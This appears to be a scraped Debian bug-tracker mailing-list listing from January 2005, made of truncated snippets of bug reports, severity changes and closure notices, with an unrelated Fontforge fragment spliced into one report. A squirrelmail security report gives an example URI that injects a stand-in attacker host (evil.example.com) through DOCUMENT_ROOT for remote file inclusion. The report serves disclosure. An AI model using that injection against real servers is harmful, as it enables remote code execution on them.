Package: less
Version: 382-2
Severity: grave
Tags: security patch
less is vulnerable to a head-based buffer overflow that can be triggered
by viewing certian binary files. This is theoretically exploitable by
providing a user with such a file and waiting for him to run less on it.
The problem was
I think I've made some progress on this.
I investigated the possibility of using Fontforge to script the copying
of glyphs from one font to another, and it turns out that this is quite
easy.
I have written two scripts:
- A Fontforge script which copies a single glyph from one font to
another
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Kimberly <[EMAIL PROTECTED]>
To: Debian Bug Tracking System
<[EMAIL PROTECTED]>
Subject: mozilla-firefox: Firefox fails to start via
gaim
Bcc: Kimberly <[EMAIL PROTECTED]>
X-Mailer: reportbug 3.2
Da
severity 292710 important
thanks
This is not a bug in either the woody or sarge version of the package, only
in a version that's no longer in the archive; so it's not release-critical
for sarge. (No version of frozen-bubble-data currently in the archive has a
postrm script.)
--
Steve Langasek
p
Processing commands for [EMAIL PROTECTED]:
> severity 292710 important
Bug#292710: unable to upgrade or remove
Severity set to `important'.
> thanks
Stopping processing here.
Please contact me if you need assistance.
Debian bug tracking system administrator
(administrator, Debian Bugs database)
Package: tomcat4
Version: 4.1.31-2
Severity: grave
Justification: renders package unusable
After upgrading to the latest "Sarge" package tomcat4 no longer starts.
I already googled, but
1) "example webapps not installed" does not apply here (umm, they're
installed but commented in server.xml)
severity 292116 normal
thanks
On Jan 29, Decklin Foster <[EMAIL PROTECTED]> wrote:
> Thanks for the fix, but this doesn't work if /bin/sh is dash -- the
> correct character to negate a character class in a pattern match is !,
> not ^ (although bash still accepts the latter for the sake of not
> g
Your message dated Fri, 28 Jan 2005 20:02:30 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#292239: fixed in oidentd 2.0.7-2
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now yo
Processing commands for [EMAIL PROTECTED]:
> severity 292116 normal
Bug#292116: module-init-tools: breaks boot-up if modutils is not installed
Severity set to `normal'.
> thanks
Stopping processing here.
Please contact me if you need assistance.
Debian bug tracking system administrator
(adminis
reopen 292116
thanks
Thanks for the fix, but this doesn't work if /bin/sh is dash -- the
correct character to negate a character class in a pattern match is !,
not ^ (although bash still accepts the latter for the sake of not
gratuitously breaking things). Cf. POSIX 3.13.
--- module-init-tools.dp
Processing commands for [EMAIL PROTECTED]:
> reopen 292116
Bug#292116: module-init-tools: breaks boot-up if modutils is not installed
Bug reopened, originator not changed.
> thanks
Stopping processing here.
Please contact me if you need assistance.
Debian bug tracking system administrator
(admi
I'm helping cleanup some of the dpkg bugs so here goes.
In response to the poster here that says magicfilter is no longer
properly installing the filters, he is incorrect.
The filters are conffiles as far as dpkg is concerned. If you move the
conffiles away, remove the package, and reinstall. Th
Package: squirrelmail
Version: 1:1.2.6-1.4
Severity: grave
Justification: user security hole
Tags: security
An attacker can attach DOCUMENT_ROOT to a SquirrelMail URI (eg,
/src/redirect.php?DOCUMENT_ROOT=http://evil.example.com). If
register_globals and allow_url_fopen are on (they are by default
Your message dated Fri, 28 Jan 2005 18:02:14 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#289796: fixed in courier-filter-perl 0.16
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it
Package: frozen-bubble-data
Version: 1.0.0-6
Severity: grave
Hello,
when I try to upgrade or remove this package, I always end up with the
following error:
Unpacking replacement frozen-bubble-data ...
mv: cannot stat `/usr/games/frozen-bubble.wav': No such file or directory
dpkg: warning - old p
> > # apt-get install libstdc++6-4.0-doc
> > [...]
> > Unpacking libstdc++6-4.0-doc (from
> > .../libstdc++6-4.0-doc_4.0-0pre4_all.deb) ...
> > dpkg: error processing
> > /var/cache/apt/archives/libstdc++6-4.0-doc_4.0-0pre4_all.deb (--unpack):
> > unable to clean up mess surrounding
> > `./usr/
severity 285135 important
thanks
A program that is doing something CPU-intensive and using a lot of
CPU is not a grave bug.
dave...
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Processing commands for [EMAIL PROTECTED]:
> severity 285135 important
Bug#285135: swf-player: Eats all CPU time and freezes galeon when various pages
are opened simultaneously.
Severity set to `important'.
> thanks
Stopping processing here.
Please contact me if you need assistance.
Debian bug
Package: siproxd
Version: 0.57.snap040720-2
Followup-For: Bug #285178
I have the same problem. I use kphone.
-- System Information:
Debian Release: testing/unstable
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.4.22
Locale: LANG=C, LC_CTYPE=C (c
On Fri, 2005-01-28 at 08:40 -0800, Brent Cordis wrote:
> Thomas Viehmann wrote ..
> > Hi Brent.
> >
> > Thank you for your interest in phpGroupWare and your bug reports.
> >
> > Brent Cordis wrote:
> > [mails without a message body and no attachments]
> >
> > Would you mind to expand on the natu
Package: quagga
Version: 0.98.0-3
Severity: serious
The postinstall script overwrites permissions in /etc. This overwrite
local configuration.
Bastian
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: i386 (i686)
Processing commands for [EMAIL PROTECTED]:
> severity 285135 grave
Bug#285135: swf-player: Eats all CPU time and freezes galeon when various pages
are opened simultaneously.
Severity set to `grave'.
> thanks
Stopping processing here.
Please contact me if you need assistance.
Debian bug trackin
Package: libmultisync-plugin-opie
Version: 0.82-5
Severity: grave
Justification: renders package unusable
Hi,
I configured the poie plugin correctly and tried it with both sftp and
ftp. Ethereal says this:
220 Qtopia 1.1.7 FTP Server
USER root
331 User name ok, need password
PASS rootme
230 Use
Package: glibc
Severity: grave
Tags: sarge
On Fri, 2005-01-28 at 09:48 -0800, David Mosberger wrote:
> Hi Dann,
>
> I don't seem to be getting much traction in getting the NPTL ld.so bug
> resolved. I posted a glibc bug-report:
>
> http://sources.redhat.com/bugzilla/show_bug.cgi?id=685
Seve
Processing commands for [EMAIL PROTECTED]:
> # Automatically generated email from bts, devscripts version 2.8.5
> severity 292669 normal
Bug#292669: RM: cdindex-client -- RoM; obsolete
Severity set to `normal'.
>
End of message, stopping processing here.
Please contact me if you need assistance.
The conflict was solved at file level but apt-get still insists to remove
ftp or ftp-ssl on install/upgrade as the pftp package conflicts with
both packages though it doesn't seem required anymore.
Thanks.
--
Michel Casabona
Processing commands for [EMAIL PROTECTED]:
> severity 207864 serious
Bug#207864: libhttpfetcher: Sometimes FTBFS due to time stamp skew and
`missing' not being executable
Severity set to `serious'.
> thanks
Stopping processing here.
Please contact me if you need assistance.
Debian bug tracking
Processing commands for [EMAIL PROTECTED]:
> # Automatically generated email from bts, devscripts version 2.8.5
> # don't let this get back to sarge
> reassign 288796 cdindex-client
Bug#288796: cdindex-client: cdindex refers to non-existent URL - is this
package obsolete?
Bug reassigned from pac
Your message dated Fri, 28 Jan 2005 12:17:18 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#236060: fixed in x10 1.06-8
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your re
The status of these bugs have changed, partial database upgrades will be
available from 0.8 to 1.0 and full upgrades thereafter.
However, I still consider SchoolBell/SchoolTool unsuitable for release
with sarge as the packages contain a large amount of a current checkout
of the zope 3 trunk.
The
Your message dated Fri, 28 Jan 2005 17:53:34 +0100
with message-id <[EMAIL PROTECTED]>
and subject line NMU acknowledged in libdbd-any-data-perl 0.08-2
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case i
On Fri, Jan 28, 2005 at 11:54:08AM +0100, Matthias Urlichs wrote:
> Hi,
>
> > On second notice, the templates have been modified to change this to
> > /gallery-icons. Doing this is not a good idea, as it will break all
> > existing installs of Apache::Gallery, and furthermore, the source
> > hasn'
tags 291500 +unreproducible +moreinfo
thanks
I installed a clean chroot and then only did 'apt-get build-dep cryptsetup'
and then the package built correctly. It also built on every other
architecture but arm, and apparently on debussy too.
Can you provide me with more information so I can reprod
Thomas Viehmann wrote ..> Hi Brent.> > Thank you for your interest in phpGroupWare and your bug reports.> > Brent Cordis wrote:> [mails without a message body and no attachments]> > Would you mind to expand on the nature of the problem you're > experiencing and the patch, please?> I'm afraid that I
tags 292569 confirmed pending
stop
On January 27, 2005 17:25, Robert Waldner wrote:
> Whilst installing amarok, I encountered the following error:
>
> Unpacking kdelibs-data (from .../kdelibs-data_4%3a3.3.2-1_all.deb) ...
> dpkg: error processing
> /var/cache/apt/archives/kdelibs-data_4%3a3.3.2-1_
Processing commands for [EMAIL PROTECTED]:
> tags 292569 confirmed pending
Bug#292569: kdelibs-data: conflicts with openoffic.org
There were no tags set.
Tags added: confirmed, pending
> stop
Stopping processing here.
Please contact me if you need assistance.
Debian bug tracking system administ
Processing commands for [EMAIL PROTECTED]:
> tags 291500 +unreproducible +moreinfo
Unknown tag/s: +moreinfo.
Recognized are: patch wontfix moreinfo unreproducible fixed potato woody sid
help security upstream pending sarge sarge-ignore experimental d-i confirmed
ipv6 lfs fixed-in-experimental fi
Processing commands for [EMAIL PROTECTED]:
> reassign 288796 ftp.debian.org
Bug#288796: cdindex-client: cdindex refers to non-existent URL - is this
package obsolete?
Bug reassigned from package `cdindex-client' to `ftp.debian.org'.
> thanks
Stopping processing here.
Please contact me if you ne
Package: gnucash
Version: 1.8.10-3
Followup-For: Bug #292130
As well as crashing upon creating a new Invoice, gnucash/unstable
crashes at the point when the system goes to create a new Bill
(after the Vendor has been selected) with the following error
message:
/usr/bin/guile-1.6: relocation erro
tags upstream
forwarded 292622 http://rt.cpan.org/NoAuth/Bugs.html?Dist=PDF-Report
thanks
Allard
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
severity 292644 normal
retitle 292644 Show a message about not being able to start with a 2.4 kernel
thanks,
On Fri, Jan 28, 2005 at 02:57:31PM +0100, Victor Martinez Moll wrote:
> -- System Information:
> Debian Release: 3.1
> APT prefers testing
> APT policy: (500, 'testing')
> Architecture:
hoi :)
On Tue, Jan 25, 2005 at 09:49:02PM +0100, Bernhard R. Link wrote:
> The following manpages say they are only distributeable under
> the GFDL, but do not include the license text required by this
> license:
I will upload a fixed version soon.
--
Martin Waitz
signature.asc
Description: D
Processing commands for [EMAIL PROTECTED]:
> severity 292644 normal
Bug#292644: hal: Hald can not be started (neither on boot nor from the command
line)
Severity set to `normal'.
> retitle 292644 Show a message about not being able to start with a 2.4 kernel
Bug#292644: hal: Hald can not be star
Processing commands for [EMAIL PROTECTED]:
> close 281698
Bug#281698: request-tracker3.2: does not work with apache2
'close' is deprecated; see http://www.debian.org/Bugs/Developer#closing.
Bug closed, send any further explanations to Ronald Vyhmeister <[EMAIL
PROTECTED]>
> tag 291164 wontfix
Bu
Processing commands for [EMAIL PROTECTED]:
> # Automatically generated email from bts, devscripts version 2.8.10
> reopen 292014
Bug#292014: xmms-jackasyn: missing endianness check produces garbage output
Bug reopened, originator not changed.
> # still waiting for 0.1-2 in sarge
> tags 292014 sa
Package: drupal
Version: 4.5.2-1
Severity: grave
Justification: causes non-serious data loss
The upgrade script from 4.4.x that this package attempts to run
apparently doesn't think to run "createlang plpgsql drupal" like it
should before doing the upgrade. This causes the upgrade to fail
horr
Package: kernel-image-2.6.8-2-k7
Version: 2.6.8-12
Severity: grave
Justification: causes non-serious data loss
Zero-length accesses to Samba shares return errors after 30s timeout, while
the requested action seems to happen:
[EMAIL PROTECTED]:/mnt/thiemo$ l test
-rw-r--r-- 1 thiemo users 0 Jan
Rene Mayrhofer wrote:
> Hi Joey,
>
> On Friday 28 January 2005 07:28, Martin Schulze wrote:
> > Stack-based buffer overflow in the get_internal_addresses function in
> > the pluto application for Openswan 1.x before 1.0.9, and Openswan 2.x
> > before 2.3.0, when compiled XAUTH and PAM enabled, all
Package: hal
Version: 0.4.2-5
Severity: grave
Justification: renders package unusable
Hald does not start.
Wen run from the command line: /usr/sbin/hald --daemon=no --verbose=yes
the output I get is:
09:48:52.271 [I] hald.c:394: hal 0.4.2
09:48:52.285 [I] hald.c:398: Will not daemonize
*** [DIE]
Your message dated Fri, 28 Jan 2005 05:47:13 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#288829: fixed in apt-proxy 1.9.25
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now y
Your message dated Fri, 28 Jan 2005 07:17:08 -0500
with message-id <[EMAIL PROTECTED]>
and subject line Bug#238246: fixed in convertfs 20050113-1
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is n
Hi,
Don Armstrong:
> [I'm hijacking this bug, because this is (in my mind anyway) a
> different problem.]
>
No problem -- as long as it gets fixed.
> On second notice, the templates have been modified to change this to
> /gallery-icons. Doing this is not a good idea, as it will break all
> exist
Hi Joey,
On Friday 28 January 2005 07:28, Martin Schulze wrote:
> Stack-based buffer overflow in the get_internal_addresses function in
> the pluto application for Openswan 1.x before 1.0.9, and Openswan 2.x
> before 2.3.0, when compiled XAUTH and PAM enabled, allows remote
> authenticated attacke
I can confirm the same bug on the Ultra Enterprise 1:
un Ultra 1 SBus (UltraSPARC 167MHz), No Keyboard
OpenBoot 3.25, 256 MB memory installed, Serial #8007118.
Ethernet address 8:0:20:7a:2d:ce, Host ID: 807a2dce.
Boot device: disk File and args:
Fast Data Access MMU Miss
ok boot cdrom
Boot devi
El Jueves 27 Enero 2005 23:25, Robert Waldner escribió:
> Package: kdelibs-data
> Version: 4:3.1.5-1
> Severity: serious
> Justification: unkown
>
>
> Whilst installing amarok, I encountered the following error:
>
> Unpacking kdelibs-data (from .../kdelibs-data_4%3a3.3.2-1_all.deb) ...
> dpkg: erro
Package: libpdf-report-perl
Version: 1.22-0.1
Severity: grave
Justification: renders package unusable
Gunnar,
I am just reporting this here for archiving purposes.
Recent uploads of the new PDF::API2 packages to Debian
(starting 2005-01-06) have caused PDF::Report to stop working
properly. The
Package: libapache-mod-aspseek
Version: 1.2.10-1.1
Severity: serious
Reviewing the license of the libapache-mod-aspseek package to verify whether
its license was compatible with the license of libmysqlclient12, I found
that this package's copyright file says it is licensed under the GNU GPL.
Unfo
Your message dated Fri, 28 Jan 2005 10:57:01 +0100
with message-id <[EMAIL PROTECTED]>
has caused the Debian Bug report #289182,
regarding kino endianness issues on powerpc
to be marked as having been forwarded to the upstream software
author(s) [EMAIL PROTECTED]
(NB: If you are a system administr
Processing commands for [EMAIL PROTECTED]:
> tags 291785 sid
Bug#291785: uw-imap_7:2002edebian1-5(ia64/unstable): FTBFS: dh_installlogrotate
error
There were no tags set.
Tags added: sid
> thanks
Stopping processing here.
Please contact me if you need assistance.
Debian bug tracking system adm
Processing commands for [EMAIL PROTECTED]:
> tags 292604 + pending
Bug#292604: icons should not have suddenly changed from icons to gallery-icons
Tags were: pending
Tags added: pending
> --
Stopping processing here.
Please contact me if you need assistance.
Debian bug tracking system administra
Processing commands for [EMAIL PROTECTED]:
> tag 292604 +pending
Bug#292604: icons should not have suddenly changed from icons to gallery-icons
There were no tags set.
Tags added: pending
> thanks
Stopping processing here.
Please contact me if you need assistance.
Debian bug tracking system adm
Processing commands for [EMAIL PROTECTED]:
> tags 289446 -sarge
Bug#289446: needs Getopt/Std.pm but doesn't depend on perl-modules
Tags were: sarge patch
Tags removed: sarge
> close 289446
Bug#289446: needs Getopt/Std.pm but doesn't depend on perl-modules
'close' is deprecated; see http://www.deb
Processing commands for [EMAIL PROTECTED]:
> tags 289295 -sarge
Bug#289295: heimdal-kdc: fresh installation fails: Section realms::REALM.ORG
doesn't exist
Tags were: sarge patch
Tags removed: sarge
> close 289295
Bug#289295: heimdal-kdc: fresh installation fails: Section realms::REALM.ORG
doesn
On 27.01.05 Robert Waldner ([EMAIL PROTECTED]) wrote:
Hi,
> Whilst installing amarok, I encountered the following error:
>
> Unpacking kdelibs-data (from .../kdelibs-data_4%3a3.3.2-1_all.deb) ...
> dpkg: error processing
> /var/cache/apt/archives/kdelibs-data_4%3a3.3.2-1_all.deb (--unpack):
> t
Package: wvdial
Version: 1.54.0-1.1
Severity: grave
Justification: renders package unusable
Hi,
I updated wvdial some days ago and cannot use my modems since then. One
of the modems is bluetooth device connected on /dev/rfcomm0. wvdial
gives:
[EMAIL PROTECTED]:~ $ wvdial
--> WvDial: Internet dial
Subject: crossfire-client-gtk: Hangs or crashes GTK
Package: crossfire-client-gtk
Version: 1.7.0-3
Severity: grave
Justification: causes non-serious data loss
*** Please type your report below this line ***
As the game goes on the memory usage seems to grow until
no free memory remains.
When the
Package: uw-imapd
Severity: grave
Justification: user security hole
The following email appearead on the c-client mailing list today. Thus I
suppose the currenlty shipping libc-client is vulnerable too:
>From [EMAIL PROTECTED] Fri Jan 28 08:33:16 2005
Date: Thu, 27 Jan 2005 14:23:14 -0800 (Pacif
Processing commands for [EMAIL PROTECTED]:
> severity 292604 serious
Bug#292604: libapache-gallery-perl: Neet "SetHandler None" for the images
Severity set to `serious'.
> retitle 292604 icons should not have suddenly changed from icons to
> gallery-icons
Bug#292604: libapache-gallery-perl: Neet
68 matches
Mail list logo
